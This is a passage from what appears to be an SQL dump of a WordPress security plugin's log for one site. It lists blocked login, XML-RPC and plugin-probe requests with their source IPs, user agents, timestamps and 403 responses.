Safari\\/537.36\"}','1T9vmy3kWxdYGj6FVfQ4aUpq',0,1664820575.0295,17267,'','POST',403,0,600,0,1,'',0),('91.134.248.249',1535572217,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','6CjL4AQan5l1kxq93mK7gHEN',0,1664820893.6331,11153,'','POST',403,0,515,0,1,'',0),('61.221.35.27',1037902619,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ISecElhKGaYVjoQyr2WCpMPB',0,1664820891.8121,12981,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','Pd8DG7Os9b5CpJLIhjaR0SN3',0,1664820890.2381,14569,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','z9SygatW16kV8oJqYUeOFiZA',0,1664820910.7769,597,'','POST',403,0,515,0,1,'',0),('208.109.10.82',3496806994,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','Zb7Dg3NpW0FC8dPSrUmfzKJA',0,1664820912.9194,909,'','POST',403,0,515,0,1,'',0),('193.136.232.254',3246975230,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','tiLGK17lvmCRO3Z6VIqkxXso',0,1664820913.6033,688,'','POST',403,0,515,0,1,'',0),('128.199.152.152',2160564376,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','gIcQU9YneMFOvkfPytzjSRo1',0,1664820918.3287,526,'','POST',403,0,515,0,1,'',0),('208.109.214.179',3496859315,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','jlY7D0V2qkLJz1euEmOZTR89',0,1664820923.2447,627,'','POST',403,0,515,0,1,'',0),('92.53.96.165',1547002021,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','FPDu8B5ihf3n0U9Y7V1W6GcR',0,1664820924.8225,496,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','ewFVYk9tT7ycu6xhHl35gJmG',0,1664821655.2033,17961,'','POST',403,0,600,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','Dz3pMqBeEvgAkKVRT1HNX6yO',0,1664821687.1649,1279,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','rKpRVwji5yUXT17oPD6tsueG',0,1664821965.5070,17196,'','POST',403,0,600,0,1,'',0),('159.203.120.246',2680912118,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','dGL7JXARSY2lmfZy9pPiCjWF',0,1664822657.9949,1159,'','POST',403,0,600,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','LFQSrCpmy2b6nWAwtx1dlJeu',0,1664822684.6735,447,'','POST',403,0,600,0,1,'',0),('205.185.124.182',3451485366,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','oQDWByj3P4gp1idlNb7FaULm',0,1664822941.6354,17499,'','POST',403,0,600,0,1,'',0),('142.93.201.0',2388510976,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','oB38eP1VKtZ2XTumls9rinfL',0,1664823479.5082,17380,'','POST',403,0,600,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','FrjsvJGDt3AqXRS9xHnKEC8b',0,1664823502.0128,457,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','E9srKdL8mVInzy1gH6laPCBA',0,1664823878.5709,1129,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','aFRLj2c39rEbIvJKGt1NAul6',0,1664824107.1411,515,'','POST',403,0,600,0,1,'',0),('185.182.57.45',3115727149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','XxjZIcH8JGV7UCenABWym03i',0,1664824230.6830,2470,'','POST',403,0,515,0,1,'',0),('91.189.176.172',1539158188,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','gFxOf7pTK241PqnrX0id6WYt',0,1664824230.5098,2683,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','R0i4D3cHSkunwVMTWysZ1aX8',0,1664824233.2087,1104,'','POST',403,0,515,0,1,'',0),('103.138.188.142',1737145486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','3BxfcEiDnbZ8MIplLo6JKWsz',0,1664824243.8052,489,'','POST',403,0,515,0,1,'',0),('143.198.134.153',2412152473,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','QwCZcYrFA6IVaPiB7mNTX3fl',0,1664824244.7854,502,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','S1gEpxqC2yRGLjlYcdZWQuzX',0,1664824251.3097,1215,'','POST',403,0,515,0,1,'',0),('128.199.207.63',2160578367,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','L2dVeSwlzFRpt4nP67fyCuDo',0,1664824255.5492,532,'','POST',403,0,515,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','o0GCurNAIFkTRqldwY8UtX4s',0,1664824258.2882,495,'','POST',403,0,515,0,1,'',0),('80.190.117.244',1354659316,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','G53DOfgAcHME4F60bht7xpLP',0,1664824261.8523,602,'','POST',403,0,600,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','4kq6LiwsNY1fjFa7mUDnxZrz',0,1664824285.1780,515,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','5dLyrpaDqoBJ1UV7Qex0M38c',0,1664825049.6701,17507,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','6JiWsoGBheZP0wE8VI2N9USj',0,1664825072.6841,2715,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','yw5ZTCxLcbEiv7WQIS8Hdzlf',0,1664825848.8349,465,'','POST',403,0,600,0,1,'',0),('157.230.44.8',2649107464,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','169tX7vzYHe5LUAlyKW0JRuT',0,1664825871.7999,1245,'','POST',403,0,600,0,1,'',0),('1.117.250.215',24509143,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','dTUtm6B4qXSn1g5Pkacj9eb7',0,1664826636.8894,11497,'','POST',403,0,600,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','EXaIprKvDy1nqxtP6GgJwuBY',0,1664826665.4069,515,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Trident\\/7.0; rv:11.0) like Gecko\"}','cPqpHFOQMhAs6LBJ4z2WGdDv',0,1664826860.3211,457,'','POST',403,0,600,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','4rYQg3vBsntoawuR9ePzf1mD',0,1664827435.8709,1232,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','nRjEgJfIYB3v1Cy4OXbWpxHL',0,1664827459.1189,540,'','POST',403,0,600,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','vxQFRWLu7zrYsVT4eHAnwqCh',0,1664828240.4542,17756,'','POST',403,0,600,0,1,'',0),('51.91.220.143',861658255,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','c6n4G1yLWJYgd2Cqe0EvSzRN',0,1664828264.1819,526,'','POST',403,0,600,0,1,'',0),('103.129.222.91',1736564315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','9nX8sFkYwJVz0ZteLagxM3UQ',0,1664829045.9914,18006,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','TRdV7uOtNS9I1i2scqz8gY0h',0,1664829068.9892,599,'','POST',403,0,600,0,1,'',0),('166.62.125.246',2789113334,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','He8Yz2ARqEh34uGI0otb16dc',0,1664829846.5877,17720,'','POST',403,0,600,0,1,'',0),('173.247.249.96',2918709600,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','mD7VzIKkH4v1pga962ePCSLl',0,1664829871.1714,501,'','POST',403,0,600,0,1,'',0),('217.21.74.40',3642051112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','7mdtMC1xEfzLFinB3VYPjQ68',0,1664829993.5651,8277,'','POST',403,0,515,0,1,'',0),('92.205.161.6',1556979974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','NL9kxuE1ZWfUiDTpzPMVG7Xm',0,1664829987.3051,14589,'','POST',403,0,515,0,1,'',0),('193.136.232.254',3246975230,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','OebRNWilYFScKxAI8o5gV2Tk',0,1664829985.7562,16147,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','pwGOmfuTEBcaFIADgSQoWdMy',0,1664830050.1924,4941,'','POST',403,0,515,0,1,'',0),('45.119.82.214',762794710,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','1MFzyVahD3IPYvSfBOtHbWJ5',0,1664830053.3341,1957,'','POST',403,0,515,0,1,'',0),('185.2.4.23',3103917079,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','WlfFz2xpEJ50mB8P1sUAZQ6q',0,1664830056.5291,500,'','POST',403,0,515,0,1,'',0),('125.212.229.33',2111104289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','ZXaAlMKIjJO1bguideqntL4H',0,1664830064.1159,770,'','POST',403,0,515,0,1,'',0),('139.99.149.60',2338559292,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','hfpq7wV62KLWGFMD45AOj01c',0,1664830064.6913,627,'','POST',403,0,515,0,1,'',0),('45.61.188.225',759020769,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','rmADPyopiIMJ7NbxFYC8R9wO',0,1664830546.3003,1244,'','POST',403,0,600,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','Noy5J8FphAitfXPZ01qz2uKH',0,1664830647.2883,17215,'','POST',403,0,600,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','FrKwGUYIaVdPXnMstQqB7Ou2',0,1664830671.1931,1373,'','POST',403,0,600,0,1,'',0),('147.78.47.249',2471374841,'','http://cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/105.0.0.0 Safari\\/537.36\"}','r7dPtebV2pQWh5XnF0ivx9jG',0,1664831004.6046,302,'','GET',403,0,700,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','fNhESVAT6nPqucbotLg0JYlj',0,1664831447.2920,17620,'','POST',403,0,600,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','ucySaCmrQEGBp26VfiYjtM5U',0,1664831471.0422,452,'','POST',403,0,600,0,1,'',0),('217.21.74.40',3642051112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','AbuiZgtKX7yGJq1we6QD9RTF',0,1664831838.3592,8621,'','POST',403,0,515,0,1,'',0),('208.109.10.82',3496806994,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','0bWK3aysBUfIM4niXLTzO8Nm',0,1664831829.1213,17974,'','POST',403,0,515,0,1,'',0),('133.18.25.1',2232555777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','zVBiSCnwWNIEPqbL0uY6h2Tv',0,1664831833.2292,13871,'','POST',403,0,515,0,1,'',0),('92.205.161.6',1556979974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','std857WFnYflHkhpqrxIZ0yP',0,1664831856.7264,509,'','POST',403,0,515,0,1,'',0),('202.61.232.79',3393054799,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','gaPUcYl72fJun1bSZoBNQHVD',0,1664831866.6440,1275,'','POST',403,0,515,0,1,'',0),('128.199.207.63',2160578367,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','zBeOTn31VvJ0WfQIGrSkUsMN',0,1664831868.1610,472,'','POST',403,0,515,0,1,'',0),('43.129.81.132',729895300,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','2gawMk1urYDoyGWclVBvF8eR',0,1664831904.5730,1441,'','POST',403,0,515,0,1,'',0),('52.172.51.19',883700499,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','8WZvPNIX0DqYQKL6xj2cAplg',0,1664831905.9069,603,'','POST',403,0,515,0,1,'',0),('185.2.6.13',3103917581,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','qdU5nsz3TigetS8ADB0X6R7h',0,1664831910.9350,525,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','QkaLGhJgTb8CfW5x073NZsjS',0,1664832250.1527,17622,'','POST',403,0,600,0,1,'',0),('165.22.198.112',2769733232,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','ctIS7UqsGLE1moyM64jzeYnp',0,1664832274.2270,474,'','POST',403,0,600,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','tzPm6kgCcjOV3WMwZry1fuJi',0,1664833053.1646,17951,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','L5QCuY7stw0eZiNPHVD63vyB',0,1664833077.6278,684,'','POST',403,0,600,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','IAraJ3ctxd2KOj4gFQ8lsVRL',0,1664833853.7626,17406,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','uJF2zETykb4Ki35XIPgNeCnY',0,1664833877.7411,454,'','POST',403,0,600,0,1,'',0),('139.196.155.194',2344917954,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','LehTCXxyDNA8pvuF4PJVbKZc',0,1664834147.0990,2279,'','POST',403,0,515,0,1,'',0),('91.208.99.2',1540383490,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','qKMWNJ7uzAGYxL19vf2lcCO0',0,1664834152.4200,497,'','POST',403,0,515,0,1,'',0),('84.22.153.127',1410767231,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','F4BNIuVj8cfXq1Lkb3rMPlEo',0,1664834171.8520,488,'','POST',403,0,515,0,1,'',0),('167.71.117.225',2806478305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','CRpyxBwPbuMWDhiF5rST9sVt',0,1664834664.7338,1231,'','POST',403,0,600,0,1,'',0),('159.203.143.36',2680917796,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','qIi4SrByE6TZCQsOcnLWud0A',0,1664834688.5628,1373,'','POST',403,0,600,0,1,'',0),('185.83.144.103',3109261415,'','http://cteisys.com/sysinfo_phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','msKS4L2glyCqn7aYF0ZziWcG',0,1664835385.2538,5785,'','GET',403,0,700,0,1,'',0),('185.83.144.103',3109261415,'','https://cteisys.com/sysinfo_phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','lZQce4V8BMvfnTSKgu0UaJF7',0,1664835386.3481,4691,'','GET',403,0,700,0,1,'',0),('80.190.117.244',1354659316,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','07ipWTogafvL91xn4uHyZes8',0,1664835475.3228,5735,'','POST',403,0,600,0,1,'',0),('34.69.109.132',574975364,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','NZnjfVDOWmSJYyKTrzEqd7Xv',0,1664835498.8146,617,'','POST',403,0,600,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','DjKZTxUgLcr2A7d1bFpenXs3',0,1664836281.6673,18245,'','POST',403,0,600,0,1,'',0),('173.247.248.182',2918709430,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','PD3wFhxASJuoqm7flBOEyMCz',0,1664836306.2846,1193,'','POST',403,0,600,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 